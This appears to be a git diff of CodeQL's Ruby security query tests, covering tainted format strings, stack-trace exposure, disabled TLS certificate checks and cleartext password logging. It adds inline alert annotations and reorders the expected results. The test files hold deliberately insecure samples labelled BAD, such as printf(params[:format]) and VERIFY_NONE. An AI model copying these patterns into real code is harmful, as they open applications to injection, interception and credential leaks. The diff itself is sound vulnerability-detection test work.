message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | -| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | -| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref index c8e1c80ec408..f688cc3f7e3f 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.qlref @@ -1 +1,2 @@ -queries/security/cwe-134/TaintedFormatString.ql +query: queries/security/cwe-134/TaintedFormatString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb index aa66a9aa4704..cff03a07ef06 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb +++ b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb @@ -1,44 +1,44 @@ class UsersController < ActionController::Base def show - printf(params[:format], arg) # BAD - Kernel.printf(params[:format], arg) # BAD + printf(params[:format], arg) # BAD # $ Alert + Kernel.printf(params[:format], arg) # BAD # $ Alert printf(params[:format]) # GOOD Kernel.printf(params[:format]) # GOOD - printf(IO.new(1), params[:format], arg) # BAD - Kernel.printf(IO.new(1), params[:format], arg) # BAD + printf(IO.new(1), params[:format], arg) # BAD # $ Alert + Kernel.printf(IO.new(1), params[:format], arg) # BAD # $ Alert printf("%s", params[:format]) # GOOD Kernel.printf("%s", params[:format]) # GOOD fmt = "%s" printf(fmt, params[:format]) # GOOD - printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] - Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] + printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] # $ Alert + Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE] # $ Alert - str1 = Kernel.sprintf(params[:format], arg) # BAD - str2 = sprintf(params[:format], arg) # BAD + str1 = Kernel.sprintf(params[:format], arg) # BAD # $ Alert + str2 = sprintf(params[:format], arg) # BAD # $ Alert str1 = Kernel.sprintf(params[:format]) # GOOD str2 = sprintf(params[:format]) # GOOD stdout = IO.new 1 - stdout.printf(params[:format], arg) # BAD + stdout.printf(params[:format], arg) # BAD # $ Alert stdout.printf(params[:format]) # GOOD # Taint via string concatenation - printf("A log message: " + params[:format], arg) # BAD + printf("A log message: " + params[:format], arg) # BAD # $ Alert # Taint via string interpolation - printf("A log message: #{params[:format]}", arg) # BAD + printf("A log message: #{params[:format]}", arg) # BAD # $ Alert # Using String# - "A log message #{params[:format]} %{foo}" % {foo: "foo"} # BAD + "A log message #{params[:format]} %{foo}" % {foo: "foo"} # BAD # $ Alert # String# with an array - "A log message #{params[:format]} %08x" % ["foo"] # BAD + "A log message #{params[:format]} %08x" % ["foo"] # BAD # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected index 00e0b4317de2..24404e8f1a9f 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected @@ -1,3 +1,7 @@ +#select +| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | +| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | +| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | edges | StackTraceExposure.rb:11:5:11:6 | bt | StackTraceExposure.rb:12:18:12:19 | bt | provenance | | | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:11:5:11:6 | bt | provenance | | @@ -8,7 +12,3 @@ nodes | StackTraceExposure.rb:12:18:12:19 | bt | semmle.label | bt | | StackTraceExposure.rb:18:18:18:28 | call to backtrace | semmle.label | call to backtrace | subpaths -#select -| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | -| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | -| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref index c110f2b1765c..ebd3ae1cee14 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.qlref @@ -1 +1,2 @@ -queries/security/cwe-209/StackTraceExposure.ql \ No newline at end of file +query: queries/security/cwe-209/StackTraceExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb index dcdf5c1f22ca..19e0c7972cf7 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.rb @@ -3,19 +3,19 @@ class FooController < ApplicationController def show something_that_might_fail() rescue => e - render body: e.backtrace, content_type: "text/plain" + render body: e.backtrace, content_type: "text/plain" # $ Alert end def show2 - bt = caller() - render body: bt, content_type: "text/plain" + bt = caller() # $ Source + render body: bt, content_type: "text/plain" # $ Alert end def show3 not_a_method() rescue NoMethodError => e - render body: e.backtrace, content_type: "text/plain" + render body: e.backtrace, content_type: "text/plain" # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-295/Excon.rb b/ruby/ql/test/query-tests/security/cwe-295/Excon.rb index 8bdabc31cf28..7838be7dfcdb 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Excon.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Excon.rb @@ -3,31 +3,31 @@ def method1 # BAD Excon.defaults[:ssl_verify_peer] = false - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method2 # BAD Excon.ssl_verify_peer = false - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method3(secure) # BAD Excon.defaults[:ssl_verify_peer] = (secure ? true : false) - Excon.get("http://example.com/") + Excon.get("http://example.com/") # $ Alert end def method4 # BAD conn = Excon::Connection.new("http://example.com/", ssl_verify_peer: false) - conn.get + conn.get # $ Alert end def method5 # BAD Excon.ssl_verify_peer = true - Excon.new("http://example.com/", ssl_verify_peer: false).get + Excon.new("http://example.com/", ssl_verify_peer: false).get # $ Alert end def method6 diff --git a/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb b/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb index 6c12db2c9e6e..1e298b82aebc 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Faraday.rb @@ -2,11 +2,11 @@ # BAD connection = Faraday.new("http://example.com", ssl: { verify: false }) -response = connection.get("/") +response = connection.get("/") # $ Alert # BAD connection = Faraday.new("http://example.com", ssl: { verify_mode: OpenSSL::SSL::VERIFY_NONE }) -response = connection.get("/") +response = connection.get("/") # $ Alert # GOOD connection = Faraday.new("http://example.com") @@ -32,7 +32,7 @@ def verify_as_arg(host, path, arg) # BAD, due to the call below connection = Faraday.new(host, ssl: { verify: arg }) - response = connection.get(path) + response = connection.get(path) # $ Alert end verify_as_arg("http://example.com", "/", false) @@ -41,7 +41,7 @@ def verify_as_arg(host, path, arg) def verify_mode_as_arg(host, path, arg) # BAD, due to the call below connection = Faraday.new(host, ssl: { verify_mode: arg }) - response = connection.get(path) + response = connection.get(path) # $ Alert end verify_mode_as_arg("http://example.com", "/", OpenSSL::SSL::VERIFY_NONE) diff --git a/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb b/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb index 902950e5be9e..dccbc0f8b523 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/HttpClient.rb @@ -3,7 +3,7 @@ # BAD client = HTTPClient.new client.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE -client.get("https://example.com") +client.get("https://example.com") # $ Alert # GOOD client = HTTPClient.new diff --git a/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb b/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb index 562cbbc1f435..575744da9e86 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Httparty.rb @@ -1,19 +1,19 @@ require "httparty" # BAD -HTTParty.get("http://example.com/", verify: false) +HTTParty.get("http://example.com/", verify: false) # $ Alert # BAD -HTTParty.get("http://example.com/", verify_peer: false) +HTTParty.get("http://example.com/", verify_peer: false) # $ Alert # BAD -HTTParty.get("http://example.com/", { verify_peer: false }) +HTTParty.get("http://example.com/", { verify_peer: false }) # $ Alert # BAD -HTTParty.post("http://example.com/", body: "some_data", verify: false) +HTTParty.post("http://example.com/", body: "some_data", verify: false) # $ Alert # BAD -HTTParty.post("http://example.com/", { body: "some_data", verify: false }) +HTTParty.post("http://example.com/", { body: "some_data", verify: false }) # $ Alert # GOOD HTTParty.get("http://example.com/") diff --git a/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb b/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb index 9269eeae5316..7915e8b80d6f 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/NetHttp.rb @@ -6,5 +6,5 @@ http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE request = Net::HTTP::Get.new uri.request_uri -response = http.request request +response = http.request request # $ Alert puts response.body diff --git a/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb b/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb index a825791c8233..377f864b5b7b 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/OpenURI.rb @@ -1,24 +1,24 @@ require "open-uri" # BAD -Kernel.open("https://example.com", ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) +Kernel.open("https://example.com", ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) # $ Alert # BAD -Kernel.open("https://example.com", { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) +Kernel.open("https://example.com", { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) # $ Alert # BAD options = { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE } -Kernel.open("https://example.com", options) +Kernel.open("https://example.com", options) # $ Alert # BAD -URI.parse("https://example.com").open(ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) +URI.parse("https://example.com").open(ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE) # $ Alert # BAD -URI.parse("https://example.com").open({ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) +URI.parse("https://example.com").open({ ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE }) # $ Alert # BAD options = { ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE } -URI.parse("https://example.com").open(options) +URI.parse("https://example.com").open(options) # $ Alert # GOOD Kernel.open("https://example.com") diff --git a/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref b/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref index e2caf232ddbc..22b77bdb4b0f 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref +++ b/ruby/ql/test/query-tests/security/cwe-295/RequestWithoutValidation.qlref @@ -1 +1,2 @@ -queries/security/cwe-295/RequestWithoutValidation.ql \ No newline at end of file +query: queries/security/cwe-295/RequestWithoutValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb b/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb index a180ac0d74c0..911607288237 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/RestClient.rb @@ -2,21 +2,21 @@ # BAD resource = RestClient::Resource.new("https://example.com", verify_ssl: OpenSSL::SSL::VERIFY_NONE) -response = resource.get +response = resource.get # $ Alert # BAD resource = RestClient::Resource.new("https://example.com", { verify_ssl: OpenSSL::SSL::VERIFY_NONE }) -response = resource.get +response = resource.get # $ Alert # BAD options = { verify_ssl: OpenSSL::SSL::VERIFY_NONE } resource = RestClient::Resource.new("https://example.com", options) -response = resource.get +response = resource.get # $ Alert # BAD value = OpenSSL::SSL::VERIFY_NONE resource = RestClient::Resource.new("https://example.com", verify_ssl: value) -response = resource.get +response = resource.get # $ Alert # GOOD RestClient.get("https://example.com") diff --git a/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb b/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb index aed601cf8889..82f91da4d920 100644 --- a/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb +++ b/ruby/ql/test/query-tests/security/cwe-295/Typhoeus.rb @@ -1,11 +1,11 @@ require "typhoeus" # BAD -Typhoeus.get("https://www.example.com", ssl_verifypeer: false) +Typhoeus.get("https://www.example.com", ssl_verifypeer: false) # $ Alert # BAD post_options = { body: "some data", ssl_verifypeer: false } -Typhoeus.post("https://www.example.com", post_options) +Typhoeus.post("https://www.example.com", post_options) # $ Alert # GOOD Typhoeus.get("https://www.example.com") \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected index 7c2d4d259e33..ae87773dd0e8 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected @@ -1,3 +1,26 @@ +#select +| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | +| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | +| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | +| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | +| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | +| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | edges | logging.rb:3:1:3:8 | password : String | logging.rb:6:20:6:27 | password | provenance | | | logging.rb:3:1:3:8 | password : String | logging.rb:8:21:8:28 | password | provenance | | @@ -89,26 +112,3 @@ nodes | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | semmle.label | "65f2950df2f0e2c38d7ba2ccca767291" : String | | logging.rb:88:5:88:16 | password_arg : String | semmle.label | password_arg : String | subpaths -#select -| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | -| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | -| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | -| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | -| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | -| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref index 4a8ed809dfc6..eb4d8d767b30 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.qlref @@ -1 +1,2 @@ -queries/security/cwe-312/CleartextLogging.ql \ No newline at end of file +query: queries/security/cwe-312/CleartextLogging.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected index 2a1c5c564652..76b6520fbdb1 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected @@ -1,3 +1,32 @@ +#select +| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | 